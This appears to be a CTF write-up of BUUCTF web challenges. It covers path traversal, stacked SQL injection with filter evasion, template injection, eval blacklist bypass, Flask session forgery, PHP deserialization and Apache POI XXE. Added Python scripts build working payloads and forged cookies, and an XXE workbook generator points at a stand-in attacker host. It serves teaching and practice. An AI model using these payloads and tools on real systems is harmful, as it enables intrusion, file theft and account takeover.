Some CTF challenges I have done recently

BUUCTF Web

[HCTF 2018]WarmUp

<?php
    highlight_file(__FILE__);
    class emmm
    {
        public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }
?>

This is the warm-up challenge. The two mb_substr/mb_strpos pairs are not just noise: checkFile compares the full $page against the whitelist first, then the part of $page before its first ?, then the same thing after urldecode; include, however, receives the full, untruncated string.

So anything of the form hint.php?<path> passes the check while include resolves <path> relative to the directory hint.php lives in: index.php?file=hint.php?../../../../../../../../../etc/passwd bypasses it. PHP normalises the .. segments itself before opening the file, so it does not matter that no directory named hint.php? exists.

According to hint.php, the flag is in ffffllllaaaagggg:

flag not here, and flag in ffffllllaaaagggg

?file=hint.php?../../../../../../../../../ffffllllaaaagggg

flag{1d0c6f0f-8c9d-446e-9b59-b226257d8bb1}
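As an added example (not code from the original writeup), here is a Python model of checkFile() together with the path that include would actually open. The whitelist is the challenge's; the script directory /var/www/html is an assumption; check_file_fixed shows the one-line fix, which is to never compare a truncated copy of the input.

```python
import posixpath
from urllib.parse import unquote

# Whitelist values from the challenge source.
WHITELIST = ("source.php", "hint.php")


def before_first_qmark(s: str) -> str:
    """mb_substr($s, 0, mb_strpos($s . '?', '?')): everything before the first '?'."""
    return s.split("?", 1)[0]


def check_file(page) -> bool:
    """Port of emmm::checkFile(); True means include $page would be reached."""
    if not isinstance(page, str):
        return False
    if page in WHITELIST:                                   # first check: exact
        return True
    if before_first_qmark(page) in WHITELIST:               # second: truncated at '?'
        return True
    if before_first_qmark(unquote(page)) in WHITELIST:      # third: urldecoded, truncated
        return True
    return False


def included_path(page: str, script_dir: str = "/var/www/html") -> str:
    """The file that include $_REQUEST['file'] ends up opening.

    PHP collapses '..' segments lexically before touching the filesystem, so a
    non-existent 'hint.php?' directory is simply stepped out of again.
    posixpath.normpath performs the same lexical normalisation. script_dir is
    an assumption; the challenge's real docroot is not known."""
    return posixpath.normpath(posixpath.join(script_dir, page))


def check_file_fixed(page) -> bool:
    """Hardened variant: compare the exact value and nothing derived from it."""
    return isinstance(page, str) and page in WHITELIST


if __name__ == "__main__":
    payload = "hint.php?" + "../" * 9 + "etc/passwd"
    print(check_file(payload), included_path(payload))   # True /etc/passwd
    print(check_file_fixed(payload))                       # False
```

The urldecode branch means hint.php%3F../../etc/passwd passes as well, which is worth remembering when a WAF in front of the app looks for a literal ?.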

[强网杯 2019]随便注

A stacked-injection challenge; the filter is:

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

Method 1: stacked injection, renaming tables so that words, the table the application reads, ends up holding the flag

# add an id column to the flag table
alter table `1919810931114514` add id int;
# rename the flag column
alter table `1919810931114514` change flag data varchar(100);
# swap the names: move words out of the way, put the flag table in its place
alter table words rename to words1;
alter table `1919810931114514` rename to words;

Each statement rides in the stacked part of the injection, i.e. 1';<statement>;#

Method 2: stacked injection with HANDLER, which reads rows without a select

1';handler `1919810931114514` open;handler `1919810931114514` read first;#

(`1919810931114514` is the table holding the flag; after the renames of method 1 it would be words.)

Method 3: stacked injection with a prepared statement, assembling the select at runtime so the filter never sees the keyword

PREPARE name FROM '[sql statement]';   # define the statement
EXECUTE name;                          # run it
DEALLOCATE PREPARE name;   (or DROP PREPARE name;)   # discard it
# POC; char(115,101,108,101,99,116) is "select"
1';PREPARE hacker from concat(char(115,101,108,101,99,116), ' * from `1919810931114514` ');EXECUTE hacker;#

Caveat: stock MySQL only accepts a string literal or a user variable after PREPARE ... FROM; putting an expression such as concat() there directly is a MariaDB extension. The portable form stores the text first: 1';set @s=concat(...);PREPARE hacker from @s;EXECUTE hacker;#

flag{75dd97f2-f0a6-4ce8-aa89-90157752c02d}
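Added example, not part of the original writeup: a Python helper that ports the challenge's filter and builds the PREPARE payload with the whole statement char()-encoded. This goes beyond the POC above in that no keyword, no table name and no . ever appears literally, so the same builder also covers db.table references. The statement name hacker and the 1'; prefix follow the POC; via_variable=True emits the user-variable form for servers whose PREPARE does not take an expression (the target being MariaDB when it is False is an assumption).

```python
import re

# The challenge's filter, unchanged:
# preg_match("/select|update|delete|drop|insert|where|\./i", $inject)
BLACKLIST = re.compile(r"select|update|delete|drop|insert|where|\.", re.IGNORECASE)


def is_blocked(inject: str) -> bool:
    return BLACKLIST.search(inject) is not None


def mysql_char(s: str) -> str:
    """Encode a string as MySQL char(...) so no keyword or '.' appears literally."""
    return "char(" + ",".join(str(b) for b in s.encode()) + ")"


def prepare_payload(statement: str, name: str = "hacker", via_variable: bool = False) -> str:
    """Stacked-injection payload that runs `statement` through PREPARE/EXECUTE.

    The whole statement text is char()-encoded. With via_variable=True the text
    is stored in @s first (portable: stock MySQL only accepts a string literal
    or a user variable after FROM); with False it is passed as an expression,
    which relies on the MariaDB extension the POC above uses (assumption).
    The leading 1'; closes the application's own quoted id value.
    """
    encoded = mysql_char(statement)
    if via_variable:
        body = f"set @s={encoded};PREPARE {name} from @s;"
    else:
        body = f"PREPARE {name} from {encoded};"
    return f"1';{body}EXECUTE {name};#"


if __name__ == "__main__":
    stmt = "select * from `1919810931114514`"
    print(is_blocked(stmt))                   # True: the raw statement is caught
    p = prepare_payload(stmt)
    print(is_blocked(p), p)                   # False: nothing left for the regex to match
```

The hex form (0x73656c656374 for "select") works the same way; char() is used here because it survives filters that reject 0x literals.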

[SUCTF 2019]EasySQL

Puzzling when all you see is the front end. The backend builds select <query>||flag from Flag, and both payloads work by getting the flag column into the output. POC:

query=0;set sql_mode=pipes_as_concat;select 1

With pipes_as_concat, || is string concatenation instead of OR, so the last stacked statement becomes select 1||flag from Flag and returns "1flag{...}".

Or:

query=*,1

which becomes select *,1||flag from Flag: the * column carries the flag and 1||flag is just 1 OR flag. The order matters: 0,* is a parse error, because an unqualified * may only stand first in the select list.

flag{051ee43e-04ae-4a2a-b7aa-c60e014550e0}

[护网杯 2018]easy_tornado

/hints.txt
md5(cookie_secret+md5(filename))

/flag.txt
flag in /fllllllllllllag

/file?filename=/flag.txt&filehash=111621266717da9574c5aed0b60b2ac9

When filehash does not match filename the app errors out and redirects to /error?msg=Error; msg is rendered through a Tornado template, which gives template injection.


{{handler.settings}} as msg dumps the application settings, including cookie_secret: f638a007-0430-4d12-8de8-baa9817fe985

md5("/fllllllllllllag") -> 3bf9f6cf685a6dd8defadabfb41a03a1

Combined, filehash = md5(cookie_secret + md5(filename)) = ecdbd8449f357be158beffda11ef7d64, so the request is /file?filename=/fllllllllllllag&filehash=ecdbd8449f357be158beffda11ef7d64

flag{8ae21794-99f0-4f7e-8ebc-210be3f9d8d7}

[RoarCTF 2019]Easy Calc

An odd one: a request like /calc.php?[space]num=2-1 works exactly like num=2-1. That is PHP itself: leading whitespace in a query-parameter name is stripped (and remaining spaces and dots become underscores) before the value lands in $_GET, so ` num` arrives as $_GET['num'], while anything in front of PHP that inspects a parameter literally named num sees nothing. The final payload below relies on this.

The functionality is a calculator, /calc.php?num=2-1; request it without the num parameter and it shows its source:

<?php
error_reporting(0);
if(!isset($_GET['num'])){
    show_source(__FILE__);
}else{
    $str = $_GET['num'];
    $blacklist = [' ', '\t', '\r', '\n','\'', '"', '`', '\[', '\]','\$','\\','\^'];
    foreach ($blacklist as $blackitem) {
        if (preg_match('/' . $blackitem . '/m', $str)) {
            die("what are you want to do?");
        }
    }
    eval('echo '.$str.';');
}
?>

/ is rejected (not by the blacklist shown, so by something in front of calc.php) and the quote characters are blacklisted, so a path cannot be written as a string literal; chr() concatenation builds it instead: var_dump(scandir(chr(47)))

array(24) { [0]=> string(1) "." [1]=> string(2) ".." [2]=> string(10) ".dockerenv" [3]=> string(3) "bin" [4]=> string(4) "boot" [5]=> string(3) "dev" [6]=> string(3) "etc" [7]=> string(5) "f1agg" [8]=> string(4) "home" [9]=> string(3) "lib" [10]=> string(5) "lib64" [11]=> string(5) "media" [12]=> string(3) "mnt" [13]=> string(3) "opt" [14]=> string(4) "proc" [15]=> string(4) "root" [16]=> string(3) "run" [17]=> string(4) "sbin" [18]=> string(3) "srv" [19]=> string(8) "start.sh" [20]=> string(3) "sys" [21]=> string(3) "tmp" [22]=> string(3) "usr" [23]=> string(3) "var" } 
>>> [f"chr({ord(i)})" for i in '/f1agg']
['chr(47)', 'chr(102)', 'chr(49)', 'chr(97)', 'chr(103)', 'chr(103)']

/calc.php? num=var_dump(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)))

string(43) "flag{139d273f-7359-4920-8d96-8ad9a0324804} "
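Added example (neither the challenge's nor the writeup's code): a Python port of the blacklist, a chr() payload builder that generalises the one-liner above to any path, and a model of how PHP rewrites the parameter name ` num`. The blacklist entries are taken from the source as-is; one caveat is noted in the comments.

```python
import re

# The challenge's blacklist, ported entry by entry (each entry is a PCRE fragment).
# Caveat: in the PHP original the '\\' entry yields the pattern /\/m, which has no
# closing delimiter, so preg_match() returns false there and a backslash is in
# fact never blocked. The port treats it as blocked, which is what was intended.
BLACKLIST = [" ", r"\t", r"\r", r"\n", "'", '"', "`", r"\[", r"\]", r"\$", r"\\", r"\^"]
BLACKLIST_RE = [re.compile(p, re.MULTILINE) for p in BLACKLIST]


def passes_blacklist(num: str) -> bool:
    """True when no blacklist pattern matches, i.e. eval() would be reached."""
    return not any(r.search(num) for r in BLACKLIST_RE)


def chr_expr(s: str) -> str:
    """Build a PHP string without quotes: chr(47).chr(102)... (byte-wise)."""
    return ".".join(f"chr({b})" for b in s.encode())


def read_file_payload(path: str) -> str:
    """var_dump(file_get_contents(<path as chr() chain>)) with no blacklisted byte."""
    return f"var_dump(file_get_contents({chr_expr(path)}))"


def php_get_param_name(raw: str) -> str:
    """How PHP rewrites a query-parameter name before it lands in $_GET:
    leading spaces are dropped, then remaining spaces and dots become '_'.
    This is why '? num=' reaches the script as $_GET['num']."""
    name = raw.lstrip(" ")
    return name.replace(" ", "_").replace(".", "_")


if __name__ == "__main__":
    p = read_file_payload("/f1agg")
    print(passes_blacklist(p), p)
    print(php_get_param_name(" num"))   # num
```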

[HCTF 2018]admin

Don't rush into testing the moment you get a challenge; look at what functionality exists first. Here I spent ages on register and login without ever logging in to see whether there was anything else. So: collect information first.

The site offers /login and /register; after registering and logging in, the page source hints:

<!-- you are not admin -->

The HTML of the password-change page /change references the app's Flask project on GitHub:

app/templates/index.html

{% if current_user.is_authenticated and session['name'] == 'admin' %}
<h1 class="nav">hctf{xxxxxxxxx}</h1>

With SECRET_KEY known, a session cookie can be generated from scratch:

/app/config.py

class Config(object):
   SECRET_KEY = os.environ.get('SECRET_KEY') or 'ckj123'

Using noraj/flask-session-cookie-manager, set session['name'] to admin and encode it into a cookie:

PS D:\Pentest Tools\flask-session-cookie-manager> python .\flask_session_cookie_manager3.py encode -t "{'_fresh': True, '_id': b'86561cb0f53290e301e0234d05d57ca8a09c26ac99715d148f2698defa473986cab75ede480e0c504f0f2f28874345d20453a16b9bdd9bf1dec052fa5d4209f8', 'csrf_token': b'ad637e8ae3908694a900de7abb65f1e0de9f0564', 'image': b'QLMC', 'name': 'admin', 'user_id': '10'}" -s "ckj123"

.eJw9kEGLwjAQhf_KMmcPbbUXwUNLanFhplSiJblItbUxaVyoijbif9-sCx6HN_Pe--YJu-PQXhTMr8OtncDu1MD8CV97mEPBREh6qYVOLXEcC5726JKH5MmIbm2QbQ3xRguuFLJeo5ZKOBOTy0LJsqDIxUjazGS-tYKXU3RmRpaU0IdQVuueWHeXPNXEk0D6DLRiLFg3JYYBVeWIrAwxyh5kV7Gwa1NU3xb9nXBJiFYqvxOgTmKpuwW8JnC4DMfd9ce05w-CqMoIXdMX-dJXN3ePFFOexchSI3mjhF1FVAmP9Df3FtkmomTxtjvZums_TpvNg8r7v3KurRegbuzpDBO4Xdrh_TcIA3j9As5tbVs.Xr4woQ.Yq5bAHKDGoBo_RgBhCL6GPlZJr0

Swap in the cookie and reload /index to get the flag.

flag{70aff5fe-c8db-4399-974e-16b2b95c0a62}
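Added example, independent of the noraj tool and not Flask's own code: a stdlib-only forge/verify pair for Flask session cookies, mirroring how Flask configures itsdangerous (salt cookie-session, HMAC-SHA1 with hmac key derivation, JSON payload, zlib-compressed and marked by a leading dot when that is shorter, and a base64url timestamp). SECRET_KEY ckj123 and the session fields come from this challenge; the 31-day expiry window is Flask's default PERMANENT_SESSION_LIFETIME and an assumption about the target.

```python
import base64
import hashlib
import hmac
import json
import time
import zlib

# Fixed parameters Flask passes to itsdangerous' URLSafeTimedSerializer.
SALT = b"cookie-session"


def _b64e(b: bytes) -> bytes:
    return base64.urlsafe_b64encode(b).rstrip(b"=")


def _b64d(s: bytes) -> bytes:
    return base64.urlsafe_b64decode(s + b"=" * (-len(s) % 4))


def _derived_key(secret_key: str) -> bytes:
    # key_derivation="hmac": signing key = HMAC-SHA1(secret_key, salt)
    return hmac.new(secret_key.encode(), SALT, hashlib.sha1).digest()


def _tag(value):
    # Minimal version of Flask's TaggedJSONSerializer: bytes become {" b": base64}
    if isinstance(value, bytes):
        return {" b": base64.b64encode(value).decode()}
    if isinstance(value, dict):
        return {k: _tag(v) for k, v in value.items()}
    return value


def _untag(value):
    if isinstance(value, dict):
        if list(value) == [" b"]:
            return base64.b64decode(value[" b"])
        return {k: _untag(v) for k, v in value.items()}
    return value


def forge_session(secret_key: str, session: dict, timestamp=None) -> str:
    """Produce a cookie Flask will accept for `session` under `secret_key`."""
    payload = json.dumps(_tag(session), separators=(",", ":"), sort_keys=True).encode()
    compressed = zlib.compress(payload)
    if len(compressed) < len(payload) - 1:        # itsdangerous' compression rule
        body = b"." + _b64e(compressed)           # leading '.' marks a zlib payload
    else:
        body = _b64e(payload)
    ts = int(time.time()) if timestamp is None else timestamp
    ts_b = _b64e(ts.to_bytes((ts.bit_length() + 7) // 8, "big"))
    signed = body + b"." + ts_b
    sig = _b64e(hmac.new(_derived_key(secret_key), signed, hashlib.sha1).digest())
    return (signed + b"." + sig).decode()


def verify_session(secret_key: str, cookie: str, max_age: int = 31 * 24 * 3600):
    """Return the session dict if signature and age check out, else None."""
    try:
        signed, sig = cookie.encode().rsplit(b".", 1)
        expected = hmac.new(_derived_key(secret_key), signed, hashlib.sha1).digest()
        if not hmac.compare_digest(expected, _b64d(sig)):
            return None
        body, ts_b = signed.rsplit(b".", 1)
        if time.time() - int.from_bytes(_b64d(ts_b), "big") > max_age:
            return None
        raw = zlib.decompress(_b64d(body[1:])) if body.startswith(b".") else _b64d(body)
        return _untag(json.loads(raw))
    except (ValueError, zlib.error):
        return None


if __name__ == "__main__":
    # SECRET_KEY from app/config.py; only the fields the template checks are needed
    cookie = forge_session("ckj123", {"name": "admin", "user_id": "10", "_fresh": True})
    print(cookie)
    print(verify_session("ckj123", cookie))
```

The cookie on the page starts with a dot for exactly the reason in forge_session: its payload was long enough for zlib to win. Flask only verifies the signature and JSON-decodes the rest, so the forged cookie does not need to reproduce the original key order or the Flask-Login fields byte for byte.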

[网鼎杯 2020 青龙组]AreUSerialz

<?php

include("flag.php");

highlight_file(__FILE__);

class FileHandler {

    protected $op;
    protected $filename;
    protected $content;

    function __construct() {
        $op = "1";
        $filename = "/tmp/tmpfile";
        $content = "Hello World!";
        $this->process();
    }

    public function process() {
        if($this->op == "1") {
            $this->write();
        } else if($this->op == "2") {
            $res = $this->read();
            $this->output($res);
        } else {
            $this->output("Bad Hacker!");
        }
    }

    private function write() {
        if(isset($this->filename) && isset($this->content)) {
            if(strlen((string)$this->content) > 100) {
                $this->output("Too long!");
                die();
            }
            $res = file_put_contents($this->filename, $this->content);
            if($res) $this->output("Successful!");
            else $this->output("Failed!");
        } else {
            $this->output("Failed!");
        }
    }

    private function read() {
        $res = "";
        if(isset($this->filename)) {
            $res = file_get_contents($this->filename);
        }
        return $res;
    }

    private function output($s) {
        echo "[Result]: <br>";
        echo $s;
    }

    function __destruct() {
        if($this->op === "2")
            $this->op = "1";
        $this->content = "";
        $this->process();
    }

}

function is_valid($s) {
    for($i = 0; $i < strlen($s); $i++)
        if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))
            return false;
    return true;
}

if(isset($_GET{'str'})) {

    $str = (string)$_GET['str'];
    if(is_valid($str)) {
        $obj = unserialize($str);
    }

}

Deserialization; the first one of these I have done.

Two things the payload has to get right. is_valid() only allows bytes 32..125, so the \0*\0 prefix PHP puts on protected property names cannot be sent; writing them as plain s:2:"op" still works, because unserialize() in PHP 7.1+ ignores the visibility marker and sets the protected member anyway. And __destruct() resets op to "1" when $this->op === "2", so op is sent as the integer 2: process() compares with == (2 == "2" is true) and calls read(), while the strict === in __destruct() does not match.

# /etc/passwd reads fine
O:11:"FileHandler":3:{s:2:"op";i:2;s:8:"filename";s:11:"/etc/passwd";s:7:"content";N;}

# reading a path that does not exist leaks the web root in the error
failed to open stream: operation failed in /var/www/html/index.php

flag.php is PHP source: echoed raw into the page, the <?php ... part is swallowed by the browser as a tag, so read it through php://filter with base64 encoding to get it out intact:

php://filter/convert.base64-encode/resource=/var/www/html/flag.php

PD9waHAgJGZsYWc9J2ZsYWd7NTljNjMwY2ItYmNhZi00NWZjLWJiNDItZGYyNTMyMmRhNWNifSc7Cg==

<?php $flag='flag{59c630cb-bcaf-45fc-bb42-df25322da5cb}';

flag{59c630cb-bcaf-45fc-bb42-df25322da5cb}
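Added example, not the writeup's code: a small Python generator for the unserialize() payload, with a port of is_valid() to show why the normal protected-property encoding is rejected and why op has to go in as an integer. The class and property names are those of the source above.

```python
# Serialization helpers for the subset of PHP types the payload needs.

def php_str(s: str) -> str:
    """PHP serialized string: s:<byte length>:"<bytes>";"""
    return f's:{len(s.encode())}:"{s}";'


def php_value(v) -> str:
    if v is None:
        return "N;"
    if isinstance(v, bool):
        return f"b:{int(v)};"
    if isinstance(v, int):
        return f"i:{v};"
    if isinstance(v, str):
        return php_str(v)
    raise TypeError(type(v))


def php_object(cls: str, props: dict, visibility: str = "public") -> str:
    """Serialize an object. PHP names protected properties "\\0*\\0name" and
    private ones "\\0Class\\0name"; 'public' emits the bare name, which a
    PHP >= 7.1 unserialize() still maps onto the protected member."""
    out = []
    for name, value in props.items():
        if visibility == "protected":
            name = "\0*\0" + name
        elif visibility == "private":
            name = f"\0{cls}\0" + name
        out.append(php_str(name) + php_value(value))
    return f'O:{len(cls)}:"{cls}":{len(props)}:{{{"".join(out)}}}'


def is_valid(s: str) -> bool:
    """Port of the challenge's is_valid(): every byte in 32..125."""
    return all(32 <= ord(ch) <= 125 for ch in s)


def read_payload(filename: str) -> str:
    """op as integer 2: process() uses == so 2 == "2" selects read(), while
    __destruct() uses === so its reset to "1" never fires."""
    return php_object("FileHandler", {"op": 2, "filename": filename, "content": None})


if __name__ == "__main__":
    p = read_payload("php://filter/convert.base64-encode/resource=/var/www/html/flag.php")
    print(is_valid(p), p)
    # the 'correct' protected encoding fails is_valid() because of the NUL bytes
    print(is_valid(php_object("FileHandler", {"op": 2}, "protected")))
```

Another common way around the NUL bytes is the string type S:, which lets them be written as \00 escapes; it is not needed here because the visibility-tolerant unserialize() makes the public form sufficient.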

[网鼎杯 2020 青龙组]filejava

The entry point is a file upload; after a successful upload a download link appears, and the download has an arbitrary file read:

/UploadServlet

/DownloadServlet?filename=e8be1e43-fd8a-4999-9786-084005051cca_1.jpg

/DownloadServlet?filename=../../../web.xml

which gives the servlet-class path:

 <servlet-class>cn.abc.servlet.DownloadServlet</servlet-class>

From that path the compiled class is at /WEB-INF/classes/cn/abc/servlet/DownloadServlet.class, and the other servlets in the package can be fetched the same way:

/DownloadServlet?filename=../../../classes/cn/abc/servlet/DownloadServlet.class
  • ListFileServlet.class
  • DownloadServlet.class
  • UploadServlet.class

Part of the decompiled UploadServlet.class shows that uploads named excel-*.xlsx are handed to a component with a known problem:

import org.apache.poi.ss.usermodel.WorkbookFactory;

...

if (filename.startsWith("excel-") && "xlsx".equals(fileExtName))
    try {
        Workbook wb1 = WorkbookFactory.create(in);
        Sheet sheet = wb1.getSheetAt(0);
        System.out.println(sheet.getFirstRowNum());
    } catch (InvalidFormatException e) {
        System.err.println("poi-ooxml-3.10 has something wrong");
        e.printStackTrace();
    }

Apache POI 3.10 has a known XXE in its OOXML package parsing (CVE-2014-3529, fixed in 3.10.1); reference: Apache-Poi-XXE-Analysis

I spent ages trying to get the XXE to call back, then found out that the BUU environment does not allow outbound connections... GG
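Added example, not from the writeup: building the excel-*.xlsx that UploadServlet feeds to WorkbookFactory.create(). An .xlsx is a zip (OPC package); the external entity goes into [Content_Types].xml, the part the POI OPC layer parses when the package is opened, before any sheet is read. attacker.example is a placeholder for the callback host, and deriving fileExtName from the text after the last dot is an assumption about the servlet.

```python
import io
import zipfile

# Minimal OPC parts of a workbook. The DOCTYPE with the parameter entity goes into
# [Content_Types].xml; {dtd_url} is filled in by build_xlsx().
CONTENT_TYPES = """<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE Types [
  <!ENTITY % remote SYSTEM "{dtd_url}">
  %remote;
]>
<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">
  <Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/>
  <Default Extension="xml" ContentType="application/xml"/>
  <Override PartName="/xl/workbook.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml"/>
  <Override PartName="/xl/worksheets/sheet1.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/>
</Types>"""

ROOT_RELS = """<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="xl/workbook.xml"/>
</Relationships>"""

WORKBOOK = """<?xml version="1.0" encoding="UTF-8"?>
<workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships">
  <sheets><sheet name="Sheet1" sheetId="1" r:id="rId1"/></sheets>
</workbook>"""

WORKBOOK_RELS = """<?xml version="1.0" encoding="UTF-8"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
  <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet1.xml"/>
</Relationships>"""

SHEET = """<?xml version="1.0" encoding="UTF-8"?>
<worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"><sheetData/></worksheet>"""


def build_xlsx(dtd_url: str) -> bytes:
    """Bytes of an .xlsx whose [Content_Types].xml pulls in the DTD at dtd_url."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("[Content_Types].xml", CONTENT_TYPES.format(dtd_url=dtd_url))
        zf.writestr("_rels/.rels", ROOT_RELS)
        zf.writestr("xl/workbook.xml", WORKBOOK)
        zf.writestr("xl/_rels/workbook.xml.rels", WORKBOOK_RELS)
        zf.writestr("xl/worksheets/sheet1.xml", SHEET)
    return buf.getvalue()


def package_parts(data: bytes) -> dict:
    """Part name -> content, for inspecting what was built."""
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        return {name: zf.read(name) for name in zf.namelist()}


def passes_upload_check(filename: str) -> bool:
    """The servlet's gate: filename.startsWith("excel-") && "xlsx".equals(fileExtName).
    Assumption: fileExtName is the text after the last dot."""
    ext = filename.rsplit(".", 1)[1] if "." in filename else ""
    return filename.startswith("excel-") and ext == "xlsx"


if __name__ == "__main__":
    name = "excel-poc.xlsx"       # must satisfy the servlet's name check
    assert passes_upload_check(name)
    with open(name, "wb") as f:
        f.write(build_xlsx("http://attacker.example/evil.dtd"))
```

The parameter entity is the out-of-band shape: the server fetches evil.dtd, and that DTD is where a file read plus exfiltration URL would be defined. With outbound traffic blocked, as the author found, the fetch never leaves the host and the payload has nowhere to report to.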
